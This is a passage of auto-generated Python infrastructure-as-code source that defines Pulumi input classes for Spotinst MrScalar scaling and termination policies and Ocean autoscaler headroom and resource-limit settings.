if cooldown is not None:
pulumi.set(__self__, "cooldown", cooldown)
if dimensions is not None:
pulumi.set(__self__, "dimensions", dimensions)
if evaluation_periods is not None:
pulumi.set(__self__, "evaluation_periods", evaluation_periods)
if max_target_capacity is not None:
pulumi.set(__self__, "max_target_capacity", max_target_capacity)
if maximum is not None:
pulumi.set(__self__, "maximum", maximum)
if min_target_capacity is not None:
pulumi.set(__self__, "min_target_capacity", min_target_capacity)
if minimum is not None:
pulumi.set(__self__, "minimum", minimum)
if operator is not None:
pulumi.set(__self__, "operator", operator)
if period is not None:
pulumi.set(__self__, "period", period)
if statistic is not None:
pulumi.set(__self__, "statistic", statistic)
if target is not None:
pulumi.set(__self__, "target", target)
@property
@pulumi.getter(name="metricName")
def metric_name(self) -> pulumi.Input[str]:
"""
The name of the metric in CloudWatch which the statement will be based on.
"""
return pulumi.get(self, "metric_name")
@metric_name.setter
def metric_name(self, value: pulumi.Input[str]):
pulumi.set(self, "metric_name", value)
@property
@pulumi.getter
def namespace(self) -> pulumi.Input[str]:
"""
Must contain the value: `AWS/ElasticMapReduce`.
"""
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: pulumi.Input[str]):
pulumi.set(self, "namespace", value)
@property
@pulumi.getter(name="policyName")
def policy_name(self) -> pulumi.Input[str]:
"""
The name of the policy.
"""
return pulumi.get(self, "policy_name")
@policy_name.setter
def policy_name(self, value: pulumi.Input[str]):
pulumi.set(self, "policy_name", value)
@property
@pulumi.getter
def threshold(self) -> pulumi.Input[float]:
"""
The value that the specified statistic is compared to.
"""
return pulumi.get(self, "threshold")
@threshold.setter
def threshold(self, value: pulumi.Input[float]):
pulumi.set(self, "threshold", value)
@property
@pulumi.getter
def unit(self) -> pulumi.Input[str]:
"""
The unit for a given metric. Valid Values: `seconds` | `microseconds` | `milliseconds` | `bytes` | `kilobytes` | `megabytes` | `gigabytes` | `terabytes` | `bits` | `kilobits` | `megabits` | `gigabits` | `terabits` | `percent` | `count` | `bytes/second` | `kilobytes/second` | `megabytes/second` | `gigabytes/second` | `terabytes/second` | `bits/second` | `kilobits/second` | `megabits/second` | `gigabits/second` | `terabits/second` | `count/second` | `none`
"""
return pulumi.get(self, "unit")
@unit.setter
def unit(self, value: pulumi.Input[str]):
pulumi.set(self, "unit", value)
@property
@pulumi.getter(name="actionType")
def action_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of action to perform. Allowed values are : 'adjustment', 'setMinTarget', 'setMaxTarget', 'updateCapacity', 'percentageAdjustment'
"""
return pulumi.get(self, "action_type")
@action_type.setter
def action_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "action_type", value)
@property
@pulumi.getter
def adjustment(self) -> Optional[pulumi.Input[str]]:
"""
The number of instances to add/remove to/from the target capacity when scale is needed.
"""
return pulumi.get(self, "adjustment")
@adjustment.setter
def adjustment(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "adjustment", value)
@property
@pulumi.getter
def cooldown(self) -> Optional[pulumi.Input[int]]:
"""
The amount of time, in seconds, after a scaling activity completes and before the next scaling activity can start.
"""
return pulumi.get(self, "cooldown")
@cooldown.setter
def cooldown(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cooldown", value)
@property
@pulumi.getter
def dimensions(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
A mapping of dimensions describing qualities of the metric.
"""
return pulumi.get(self, "dimensions")
@dimensions.setter
def dimensions(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "dimensions", value)
@property
@pulumi.getter(name="evaluationPeriods")
def evaluation_periods(self) -> Optional[pulumi.Input[int]]:
"""
The number of periods over which data is compared to the specified threshold.
"""
return pulumi.get(self, "evaluation_periods")
@evaluation_periods.setter
def evaluation_periods(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "evaluation_periods", value)
@property
@pulumi.getter(name="maxTargetCapacity")
def max_target_capacity(self) -> Optional[pulumi.Input[str]]:
"""
Max target capacity for scale down.
"""
return pulumi.get(self, "max_target_capacity")
@max_target_capacity.setter
def max_target_capacity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "max_target_capacity", value)
@property
@pulumi.getter
def maximum(self) -> Optional[pulumi.Input[str]]:
"""
The maximum to set when scale is needed.
"""
return pulumi.get(self, "maximum")
@maximum.setter
def maximum(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "maximum", value)
@property
@pulumi.getter(name="minTargetCapacity")
def min_target_capacity(self) -> Optional[pulumi.Input[str]]:
"""
Min target capacity for scale up.
"""
return pulumi.get(self, "min_target_capacity")
@min_target_capacity.setter
def min_target_capacity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "min_target_capacity", value)
@property
@pulumi.getter
def minimum(self) -> Optional[pulumi.Input[str]]:
"""
The minimum to set when scale is needed.
"""
return pulumi.get(self, "minimum")
@minimum.setter
def minimum(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "minimum", value)
@property
@pulumi.getter
def operator(self) -> Optional[pulumi.Input[str]]:
"""
The operator to use in order to determine if the policy is applicable. Valid values: `gt` | `gte` | `lt` | `lte`
"""
return pulumi.get(self, "operator")
@operator.setter
def operator(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "operator", value)
@property
@pulumi.getter
def period(self) -> Optional[pulumi.Input[int]]:
"""
The time window in seconds over which the statistic is applied.
"""
return pulumi.get(self, "period")
@period.setter
def period(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "period", value)
@property
@pulumi.getter
def statistic(self) -> Optional[pulumi.Input[str]]:
"""
The aggregation method of the given metric. Valid Values: `average` | `sum` | `sampleCount` | `maximum` | `minimum`
"""
return pulumi.get(self, "statistic")
@statistic.setter
def statistic(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "statistic", value)
@property
@pulumi.getter
def target(self) -> Optional[pulumi.Input[str]]:
"""
The number of instances to set when scale is needed.
"""
return pulumi.get(self, "target")
@target.setter
def target(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target", value)
@pulumi.input_type
class MrScalarTaskScalingUpPolicyArgs:
def __init__(__self__, *,
metric_name: pulumi.Input[str],
namespace: pulumi.Input[str],
policy_name: pulumi.Input[str],
threshold: pulumi.Input[float],
unit: pulumi.Input[str],
action_type: Optional[pulumi.Input[str]] = None,
adjustment: Optional[pulumi.Input[str]] = None,
cooldown: Optional[pulumi.Input[int]] = None,
dimensions: Optional[pulumi.Input[Mapping[str, Any]]] = None,
evaluation_periods: Optional[pulumi.Input[int]] = None,
max_target_capacity: Optional[pulumi.Input[str]] = None,
maximum: Optional[pulumi.Input[str]] = None,
min_target_capacity: Optional[pulumi.Input[str]] = None,
minimum: Optional[pulumi.Input[str]] = None,
operator: Optional[pulumi.Input[str]] = None,
period: Optional[pulumi.Input[int]] = None,
statistic: Optional[pulumi.Input[str]] = None,
target: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] metric_name: The name of the metric in CloudWatch which the statement will be based on.
:param pulumi.Input[str] namespace: Must contain the value: `AWS/ElasticMapReduce`.
:param pulumi.Input[str] policy_name: The name of the policy.
:param pulumi.Input[float] threshold: The value that the specified statistic is compared to.
:param pulumi.Input[str] unit: The unit for a given metric. Valid Values: `seconds` | `microseconds` | `milliseconds` | `bytes` | `kilobytes` | `megabytes` | `gigabytes` | `terabytes` | `bits` | `kilobits` | `megabits` | `gigabits` | `terabits` | `percent` | `count` | `bytes/second` | `kilobytes/second` | `megabytes/second` | `gigabytes/second` | `terabytes/second` | `bits/second` | `kilobits/second` | `megabits/second` | `gigabits/second` | `terabits/second` | `count/second` | `none`
:param pulumi.Input[str] action_type: The type of action to perform. Allowed values are : 'adjustment', 'setMinTarget', 'setMaxTarget', 'updateCapacity', 'percentageAdjustment'
:param pulumi.Input[str] adjustment: The number of instances to add/remove to/from the target capacity when scale is needed.
:param pulumi.Input[int] cooldown: The amount of time, in seconds, after a scaling activity completes and before the next scaling activity can start.
:param pulumi.Input[Mapping[str, Any]] dimensions: A mapping of dimensions describing qualities of the metric.
:param pulumi.Input[int] evaluation_periods: The number of periods over which data is compared to the specified threshold.
:param pulumi.Input[str] max_target_capacity: Max target capacity for scale down.
:param pulumi.Input[str] maximum: The maximum to set when scale is needed.
:param pulumi.Input[str] min_target_capacity: Min target capacity for scale up.
:param pulumi.Input[str] minimum: The minimum to set when scale is needed.
:param pulumi.Input[str] operator: The operator to use in order to determine if the policy is applicable. Valid values: `gt` | `gte` | `lt` | `lte`
:param pulumi.Input[int] period: The time window in seconds over which the statistic is applied.
:param pulumi.Input[str] statistic: The aggregation method of the given metric. Valid Values: `average` | `sum` | `sampleCount` | `maximum` | `minimum`
:param pulumi.Input[str] target: The number of instances to set when scale is needed.
"""
pulumi.set(__self__, "metric_name", metric_name)
pulumi.set(__self__, "namespace", namespace)
pulumi.set(__self__, "policy_name", policy_name)
pulumi.set(__self__, "threshold", threshold)
pulumi.set(__self__, "unit", unit)
if action_type is not None:
pulumi.set(__self__, "action_type", action_type)
if adjustment is not None:
pulumi.set(__self__, "adjustment", adjustment)
if cooldown is not None:
pulumi.set(__self__, "cooldown", cooldown)
if dimensions is not None:
pulumi.set(__self__, "dimensions", dimensions)
if evaluation_periods is not None:
pulumi.set(__self__, "evaluation_periods", evaluation_periods)
if max_target_capacity is not None:
pulumi.set(__self__, "max_target_capacity", max_target_capacity)
if maximum is not None:
pulumi.set(__self__, "maximum", maximum)
if min_target_capacity is not None:
pulumi.set(__self__, "min_target_capacity", min_target_capacity)
if minimum is not None:
pulumi.set(__self__, "minimum", minimum)
if operator is not None:
pulumi.set(__self__, "operator", operator)
if period is not None:
pulumi.set(__self__, "period", period)
if statistic is not None:
pulumi.set(__self__, "statistic", statistic)
if target is not None:
pulumi.set(__self__, "target", target)
@property
@pulumi.getter(name="metricName")
def metric_name(self) -> pulumi.Input[str]:
"""
The name of the metric in CloudWatch which the statement will be based on.
"""
return pulumi.get(self, "metric_name")
@metric_name.setter
def metric_name(self, value: pulumi.Input[str]):
pulumi.set(self, "metric_name", value)
@property
@pulumi.getter
def namespace(self) -> pulumi.Input[str]:
"""
Must contain the value: `AWS/ElasticMapReduce`.
"""
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: pulumi.Input[str]):
pulumi.set(self, "namespace", value)
@property
@pulumi.getter(name="policyName")
def policy_name(self) -> pulumi.Input[str]:
"""
The name of the policy.
"""
return pulumi.get(self, "policy_name")
@policy_name.setter
def policy_name(self, value: pulumi.Input[str]):
pulumi.set(self, "policy_name", value)
@property
@pulumi.getter
def threshold(self) -> pulumi.Input[float]:
"""
The value that the specified statistic is compared to.
"""
return pulumi.get(self, "threshold")
@threshold.setter
def threshold(self, value: pulumi.Input[float]):
pulumi.set(self, "threshold", value)
@property
@pulumi.getter
def unit(self) -> pulumi.Input[str]:
"""
The unit for a given metric. Valid Values: `seconds` | `microseconds` | `milliseconds` | `bytes` | `kilobytes` | `megabytes` | `gigabytes` | `terabytes` | `bits` | `kilobits` | `megabits` | `gigabits` | `terabits` | `percent` | `count` | `bytes/second` | `kilobytes/second` | `megabytes/second` | `gigabytes/second` | `terabytes/second` | `bits/second` | `kilobits/second` | `megabits/second` | `gigabits/second` | `terabits/second` | `count/second` | `none`
"""
return pulumi.get(self, "unit")
@unit.setter
def unit(self, value: pulumi.Input[str]):
pulumi.set(self, "unit", value)
@property
@pulumi.getter(name="actionType")
def action_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of action to perform. Allowed values are : 'adjustment', 'setMinTarget', 'setMaxTarget', 'updateCapacity', 'percentageAdjustment'
"""
return pulumi.get(self, "action_type")
@action_type.setter
def action_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "action_type", value)
@property
@pulumi.getter
def adjustment(self) -> Optional[pulumi.Input[str]]:
"""
The number of instances to add/remove to/from the target capacity when scale is needed.
"""
return pulumi.get(self, "adjustment")
@adjustment.setter
def adjustment(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "adjustment", value)
@property
@pulumi.getter
def cooldown(self) -> Optional[pulumi.Input[int]]:
"""
The amount of time, in seconds, after a scaling activity completes and before the next scaling activity can start.
"""
return pulumi.get(self, "cooldown")
@cooldown.setter
def cooldown(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cooldown", value)
@property
@pulumi.getter
def dimensions(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
A mapping of dimensions describing qualities of the metric.
"""
return pulumi.get(self, "dimensions")
@dimensions.setter
def dimensions(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "dimensions", value)
@property
@pulumi.getter(name="evaluationPeriods")
def evaluation_periods(self) -> Optional[pulumi.Input[int]]:
"""
The number of periods over which data is compared to the specified threshold.
"""
return pulumi.get(self, "evaluation_periods")
@evaluation_periods.setter
def evaluation_periods(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "evaluation_periods", value)
@property
@pulumi.getter(name="maxTargetCapacity")
def max_target_capacity(self) -> Optional[pulumi.Input[str]]:
"""
Max target capacity for scale down.
"""
return pulumi.get(self, "max_target_capacity")
@max_target_capacity.setter
def max_target_capacity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "max_target_capacity", value)
@property
@pulumi.getter
def maximum(self) -> Optional[pulumi.Input[str]]:
"""
The maximum to set when scale is needed.
"""
return pulumi.get(self, "maximum")
@maximum.setter
def maximum(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "maximum", value)
@property
@pulumi.getter(name="minTargetCapacity")
def min_target_capacity(self) -> Optional[pulumi.Input[str]]:
"""
Min target capacity for scale up.
"""
return pulumi.get(self, "min_target_capacity")
@min_target_capacity.setter
def min_target_capacity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "min_target_capacity", value)
@property
@pulumi.getter
def minimum(self) -> Optional[pulumi.Input[str]]:
"""
The minimum to set when scale is needed.
"""
return pulumi.get(self, "minimum")
@minimum.setter
def minimum(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "minimum", value)
@property
@pulumi.getter
def operator(self) -> Optional[pulumi.Input[str]]:
"""
The operator to use in order to determine if the policy is applicable. Valid values: `gt` | `gte` | `lt` | `lte`
"""
return pulumi.get(self, "operator")
@operator.setter
def operator(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "operator", value)
@property
@pulumi.getter
def period(self) -> Optional[pulumi.Input[int]]:
"""
The time window in seconds over which the statistic is applied.
"""
return pulumi.get(self, "period")
@period.setter
def period(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "period", value)
@property
@pulumi.getter
def statistic(self) -> Optional[pulumi.Input[str]]:
"""
The aggregation method of the given metric. Valid Values: `average` | `sum` | `sampleCount` | `maximum` | `minimum`
"""
return pulumi.get(self, "statistic")
@statistic.setter
def statistic(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "statistic", value)
@property
@pulumi.getter
def target(self) -> Optional[pulumi.Input[str]]:
"""
The number of instances to set when scale is needed.
"""
return pulumi.get(self, "target")
@target.setter
def target(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target", value)
@pulumi.input_type
class MrScalarTerminationPolicyArgs:
def __init__(__self__, *,
statements: pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyStatementArgs']]]):
pulumi.set(__self__, "statements", statements)
@property
@pulumi.getter
def statements(self) -> pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyStatementArgs']]]:
return pulumi.get(self, "statements")
@statements.setter
def statements(self, value: pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyStatementArgs']]]):
pulumi.set(self, "statements", value)
@pulumi.input_type
class MrScalarTerminationPolicyStatementArgs:
def __init__(__self__, *,
metric_name: pulumi.Input[str],
namespace: pulumi.Input[str],
threshold: pulumi.Input[float],
evaluation_periods: Optional[pulumi.Input[int]] = None,
operator: Optional[pulumi.Input[str]] = None,
period: Optional[pulumi.Input[int]] = None,
statistic: Optional[pulumi.Input[str]] = None,
unit: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] metric_name: The name of the metric in CloudWatch which the statement will be based on.
:param pulumi.Input[str] namespace: Must contain the value: `AWS/ElasticMapReduce`.
:param pulumi.Input[float] threshold: The value that the specified statistic is compared to.
:param pulumi.Input[int] evaluation_periods: The number of periods over which data is compared to the specified threshold.
:param pulumi.Input[str] operator: The operator to use in order to determine if the policy is applicable. Valid values: `gt` | `gte` | `lt` | `lte`
:param pulumi.Input[int] period: The time window in seconds over which the statistic is applied.
:param pulumi.Input[str] statistic: The aggregation method of the given metric. Valid Values: `average` | `sum` | `sampleCount` | `maximum` | `minimum`
:param pulumi.Input[str] unit: The unit for a given metric. Valid Values: `seconds` | `microseconds` | `milliseconds` | `bytes` | `kilobytes` | `megabytes` | `gigabytes` | `terabytes` | `bits` | `kilobits` | `megabits` | `gigabits` | `terabits` | `percent` | `count` | `bytes/second` | `kilobytes/second` | `megabytes/second` | `gigabytes/second` | `terabytes/second` | `bits/second` | `kilobits/second` | `megabits/second` | `gigabits/second` | `terabits/second` | `count/second` | `none`
"""
pulumi.set(__self__, "metric_name", metric_name)
pulumi.set(__self__, "namespace", namespace)
pulumi.set(__self__, "threshold", threshold)
if evaluation_periods is not None:
pulumi.set(__self__, "evaluation_periods", evaluation_periods)
if operator is not None:
pulumi.set(__self__, "operator", operator)
if period is not None:
pulumi.set(__self__, "period", period)
if statistic is not None:
pulumi.set(__self__, "statistic", statistic)
if unit is not None:
pulumi.set(__self__, "unit", unit)
@property
@pulumi.getter(name="metricName")
def metric_name(self) -> pulumi.Input[str]:
"""
The name of the metric in CloudWatch which the statement will be based on.
"""
return pulumi.get(self, "metric_name")
@metric_name.setter
def metric_name(self, value: pulumi.Input[str]):
pulumi.set(self, "metric_name", value)
@property
@pulumi.getter
def namespace(self) -> pulumi.Input[str]:
"""
Must contain the value: `AWS/ElasticMapReduce`.
"""
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: pulumi.Input[str]):
pulumi.set(self, "namespace", value)
@property
@pulumi.getter
def threshold(self) -> pulumi.Input[float]:
"""
The value that the specified statistic is compared to.
"""
return pulumi.get(self, "threshold")
@threshold.setter
def threshold(self, value: pulumi.Input[float]):
pulumi.set(self, "threshold", value)
@property
@pulumi.getter(name="evaluationPeriods")
def evaluation_periods(self) -> Optional[pulumi.Input[int]]:
"""
The number of periods over which data is compared to the specified threshold.
"""
return pulumi.get(self, "evaluation_periods")
@evaluation_periods.setter
def evaluation_periods(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "evaluation_periods", value)
@property
@pulumi.getter
def operator(self) -> Optional[pulumi.Input[str]]:
"""
The operator to use in order to determine if the policy is applicable. Valid values: `gt` | `gte` | `lt` | `lte`
"""
return pulumi.get(self, "operator")
@operator.setter
def operator(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "operator", value)
@property
@pulumi.getter
def period(self) -> Optional[pulumi.Input[int]]:
"""
The time window in seconds over which the statistic is applied.
"""
return pulumi.get(self, "period")
@period.setter
def period(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "period", value)
@property
@pulumi.getter
def statistic(self) -> Optional[pulumi.Input[str]]:
"""
The aggregation method of the given metric. Valid Values: `average` | `sum` | `sampleCount` | `maximum` | `minimum`
"""
return pulumi.get(self, "statistic")
@statistic.setter
def statistic(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "statistic", value)
@property
@pulumi.getter
def unit(self) -> Optional[pulumi.Input[str]]:
"""
The unit for a given metric. Valid Values: `seconds` | `microseconds` | `milliseconds` | `bytes` | `kilobytes` | `megabytes` | `gigabytes` | `terabytes` | `bits` | `kilobits` | `megabits` | `gigabits` | `terabits` | `percent` | `count` | `bytes/second` | `kilobytes/second` | `megabytes/second` | `gigabytes/second` | `terabytes/second` | `bits/second` | `kilobits/second` | `megabits/second` | `gigabits/second` | `terabits/second` | `count/second` | `none`
"""
return pulumi.get(self, "unit")
@unit.setter
def unit(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "unit", value)
@pulumi.input_type
class OceanAutoscalerArgs:
def __init__(__self__, *,
auto_headroom_percentage: Optional[pulumi.Input[int]] = None,
autoscale_cooldown: Optional[pulumi.Input[int]] = None,
autoscale_down: Optional[pulumi.Input['OceanAutoscalerAutoscaleDownArgs']] = None,
autoscale_headroom: Optional[pulumi.Input['OceanAutoscalerAutoscaleHeadroomArgs']] = None,
autoscale_is_auto_config: Optional[pulumi.Input[bool]] = None,
autoscale_is_enabled: Optional[pulumi.Input[bool]] = None,
resource_limits: Optional[pulumi.Input['OceanAutoscalerResourceLimitsArgs']] = None):
"""
:param pulumi.Input[int] auto_headroom_percentage: Set the auto headroom percentage (a number in the range [0, 200]) which controls the percentage of headroom from the cluster. Relevant only when `autoscale_is_auto_config` toggled on.
:param pulumi.Input[int] autoscale_cooldown: Cooldown period between scaling actions.
:param pulumi.Input['OceanAutoscalerAutoscaleDownArgs'] autoscale_down: Auto Scaling scale down operations.
:param pulumi.Input['OceanAutoscalerAutoscaleHeadroomArgs'] autoscale_headroom: Spare resource capacity management enabling fast assignment of Pods without waiting for new resources to launch.
:param pulumi.Input[bool] autoscale_is_auto_config: Automatically configure and optimize headroom resources.
:param pulumi.Input[bool] autoscale_is_enabled: Enable the Ocean Kubernetes Auto Scaler.
:param pulumi.Input['OceanAutoscalerResourceLimitsArgs'] resource_limits: Optionally set upper and lower bounds on the resource usage of the cluster.
"""
if auto_headroom_percentage is not None:
pulumi.set(__self__, "auto_headroom_percentage", auto_headroom_percentage)
if autoscale_cooldown is not None:
pulumi.set(__self__, "autoscale_cooldown", autoscale_cooldown)
if autoscale_down is not None:
pulumi.set(__self__, "autoscale_down", autoscale_down)
if autoscale_headroom is not None:
pulumi.set(__self__, "autoscale_headroom", autoscale_headroom)
if autoscale_is_auto_config is not None:
pulumi.set(__self__, "autoscale_is_auto_config", autoscale_is_auto_config)
if autoscale_is_enabled is not None:
pulumi.set(__self__, "autoscale_is_enabled", autoscale_is_enabled)
if resource_limits is not None:
pulumi.set(__self__, "resource_limits", resource_limits)
@property
@pulumi.getter(name="autoHeadroomPercentage")
def auto_headroom_percentage(self) -> Optional[pulumi.Input[int]]:
"""
Set the auto headroom percentage (a number in the range [0, 200]) which controls the percentage of headroom from the cluster. Relevant only when `autoscale_is_auto_config` toggled on.
"""
return pulumi.get(self, "auto_headroom_percentage")
@auto_headroom_percentage.setter
def auto_headroom_percentage(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "auto_headroom_percentage", value)
@property
@pulumi.getter(name="autoscaleCooldown")
def autoscale_cooldown(self) -> Optional[pulumi.Input[int]]:
"""
Cooldown period between scaling actions.
"""
return pulumi.get(self, "autoscale_cooldown")
@autoscale_cooldown.setter
def autoscale_cooldown(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "autoscale_cooldown", value)
@property
@pulumi.getter(name="autoscaleDown")
def autoscale_down(self) -> Optional[pulumi.Input['OceanAutoscalerAutoscaleDownArgs']]:
"""
Auto Scaling scale down operations.
"""
return pulumi.get(self, "autoscale_down")
@autoscale_down.setter
def autoscale_down(self, value: Optional[pulumi.Input['OceanAutoscalerAutoscaleDownArgs']]):
pulumi.set(self, "autoscale_down", value)
@property
@pulumi.getter(name="autoscaleHeadroom")
def autoscale_headroom(self) -> Optional[pulumi.Input['OceanAutoscalerAutoscaleHeadroomArgs']]:
"""
Spare resource capacity management enabling fast assignment of Pods without waiting for new resources to launch.
"""
return pulumi.get(self, "autoscale_headroom")
@autoscale_headroom.setter
def autoscale_headroom(self, value: Optional[pulumi.Input['OceanAutoscalerAutoscaleHeadroomArgs']]):
pulumi.set(self, "autoscale_headroom", value)
@property
@pulumi.getter(name="autoscaleIsAutoConfig")
def autoscale_is_auto_config(self) -> Optional[pulumi.Input[bool]]:
"""
Automatically configure and optimize headroom resources.
"""
return pulumi.get(self, "autoscale_is_auto_config")
@autoscale_is_auto_config.setter
def autoscale_is_auto_config(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "autoscale_is_auto_config", value)
@property
@pulumi.getter(name="autoscaleIsEnabled")
def autoscale_is_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Enable the Ocean Kubernetes Auto Scaler.
"""
return pulumi.get(self, "autoscale_is_enabled")
@autoscale_is_enabled.setter
def autoscale_is_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "autoscale_is_enabled", value)
@property
@pulumi.getter(name="resourceLimits")
def resource_limits(self) -> Optional[pulumi.Input['OceanAutoscalerResourceLimitsArgs']]:
"""
Optionally set upper and lower bounds on the resource usage of the cluster.
"""
return pulumi.get(self, "resource_limits")
@resource_limits.setter
def resource_limits(self, value: Optional[pulumi.Input['OceanAutoscalerResourceLimitsArgs']]):
pulumi.set(self, "resource_limits", value)
@pulumi.input_type
class OceanAutoscalerAutoscaleDownArgs:
def __init__(__self__, *,
evaluation_periods: Optional[pulumi.Input[int]] = None,
max_scale_down_percentage: Optional[pulumi.Input[float]] = None):
"""
:param pulumi.Input[float] max_scale_down_percentage: Would represent the maximum % to scale-down. Number between 1-100.
"""
if evaluation_periods is not None:
pulumi.set(__self__, "evaluation_periods", evaluation_periods)
if max_scale_down_percentage is not None:
pulumi.set(__self__, "max_scale_down_percentage", max_scale_down_percentage)
@property
@pulumi.getter(name="evaluationPeriods")
def evaluation_periods(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "evaluation_periods")
@evaluation_periods.setter
def evaluation_periods(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "evaluation_periods", value)
@property
@pulumi.getter(name="maxScaleDownPercentage")
def max_scale_down_percentage(self) -> Optional[pulumi.Input[float]]:
"""
Would represent the maximum % to scale-down. Number between 1-100.
"""
return pulumi.get(self, "max_scale_down_percentage")
@max_scale_down_percentage.setter
def max_scale_down_percentage(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "max_scale_down_percentage", value)
@pulumi.input_type
class OceanAutoscalerAutoscaleHeadroomArgs:
def __init__(__self__, *,
cpu_per_unit: Optional[pulumi.Input[int]] = None,
gpu_per_unit: Optional[pulumi.Input[int]] = None,
memory_per_unit: Optional[pulumi.Input[int]] = None,
num_of_units: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[int] cpu_per_unit: Optionally configure the number of CPUs to allocate the headroom. CPUs are denoted in millicores, where 1000 millicores = 1 vCPU.
:param pulumi.Input[int] gpu_per_unit: Optionally configure the number of GPUs to allocate the headroom.
:param pulumi.Input[int] memory_per_unit: Optionally configure the amount of memory (MB) to allocate the headroom.
:param pulumi.Input[int] num_of_units: The number of units to retain as headroom, where each unit has the defined headroom CPU and memory.
"""
if cpu_per_unit is not None:
pulumi.set(__self__, "cpu_per_unit", cpu_per_unit)
if gpu_per_unit is not None:
pulumi.set(__self__, "gpu_per_unit", gpu_per_unit)
if memory_per_unit is not None:
pulumi.set(__self__, "memory_per_unit", memory_per_unit)
if num_of_units is not None:
pulumi.set(__self__, "num_of_units", num_of_units)
@property
@pulumi.getter(name="cpuPerUnit")
def cpu_per_unit(self) -> Optional[pulumi.Input[int]]:
"""
Optionally configure the number of CPUs to allocate the headroom. CPUs are denoted in millicores, where 1000 millicores = 1 vCPU.
"""
return pulumi.get(self, "cpu_per_unit")
@cpu_per_unit.setter
def cpu_per_unit(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cpu_per_unit", value)
@property
@pulumi.getter(name="gpuPerUnit")
def gpu_per_unit(self) -> Optional[pulumi.Input[int]]:
"""
Optionally configure the number of GPUs to allocate the headroom.
"""
return pulumi.get(self, "gpu_per_unit")
@gpu_per_unit.setter
def gpu_per_unit(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "gpu_per_unit", value)
@property
@pulumi.getter(name="memoryPerUnit")
def memory_per_unit(self) -> Optional[pulumi.Input[int]]:
"""
Optionally configure the amount of memory (MB) to allocate the headroom.
"""
return pulumi.get(self, "memory_per_unit")
@memory_per_unit.setter
def memory_per_unit(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "memory_per_unit", value)
@property
@pulumi.getter(name="numOfUnits")
def num_of_units(self) -> Optional[pulumi.Input[int]]:
"""
The number of units to retain as headroom, where each unit has the defined headroom CPU and memory.
"""
return pulumi.get(self, "num_of_units")
@num_of_units.setter
def num_of_units(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "num_of_units", value)
@pulumi.input_type
class OceanAutoscalerResourceLimitsArgs:
def __init__(__self__, *,
max_memory_gib: Optional[pulumi.Input[int]] = None,
max_vcpu: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[int] max_memory_gib: The maximum memory in GiB units that can be allocated to the cluster.
:param pulumi.Input[int] max_vcpu: The maximum cpu in vCPU units that can be allocated to the cluster.
"""
if max_memory_gib is not None:
pulumi.set(__self__, "max_memory_gib", max_memory_gib)
if max_vcpu is not None:
pulumi.set(__self__, "max_vcpu", max_vcpu)
@property
@pulumi.getter(name="maxMemoryGib")
def max_memory_gib(self) -> Optional[pulumi.Input[int]]:
"""
The maximum memory in GiB units that can be allocated to the cluster.
"""
return pulumi.get(self, "max_memory_gib")
@max_memory_gib.setter
def max_memory_gib(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_memory_gib", value)
@property
@pulumi.getter(name="maxVcpu")
def max_vcpu(self) -> Optional[pulumi.Input[int]]:
"""
The maximum cpu in vCPU units that can be allocated to the cluster.
"""
return pulumi.get(self, "max_vcpu")
@max_vcpu.setter
def max_vcpu(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_vcpu", value)
@pulumi.input_type
